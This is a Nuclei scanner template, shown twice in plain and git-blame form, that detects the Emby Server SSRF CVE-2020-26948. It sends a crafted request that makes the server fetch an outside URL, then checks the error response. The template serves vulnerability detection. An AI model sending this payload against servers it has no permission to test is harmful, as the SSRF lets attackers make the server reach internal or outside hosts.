nuclei-templates/cves/2020/CVE-2020-26948.yaml

id: CVE-2020-26948

info:
  name: Emby Server SSRF
  author: dwisiswant0
  severity: critical
  reference: https://github.com/btnz-k/emby_ssrf
  description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter.
  tags: cve,cve2020,emby,jellyfin,ssrf

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        words:
          - "Name or service not known"
        part: body
      - type: word
        words:
          - "text/plain"
        part: header
:fire: Add CVE-2020-26948 2021-03-02 02:53:18 +00:00			`id: CVE-2020-26948`

			`info:`
			`name: Emby Server SSRF`
			`author: dwisiswant0`
			`severity: critical`
			`reference: https://github.com/btnz-k/emby_ssrf`
			`description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter.`
			`tags: cve,cve2020,emby,jellyfin,ssrf`

			`requests:`
			`- method: GET`
			`path:`
Update CVE-2020-26948.yaml 2021-03-02 07:52:26 +00:00			`- "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"`
:fire: Add CVE-2020-26948 2021-03-02 02:53:18 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 500`
			`- type: word`
			`words:`
			`- "Name or service not known"`
			`part: body`
			`- type: word`
			`words:`
			`- "text/plain"`
			`part: header`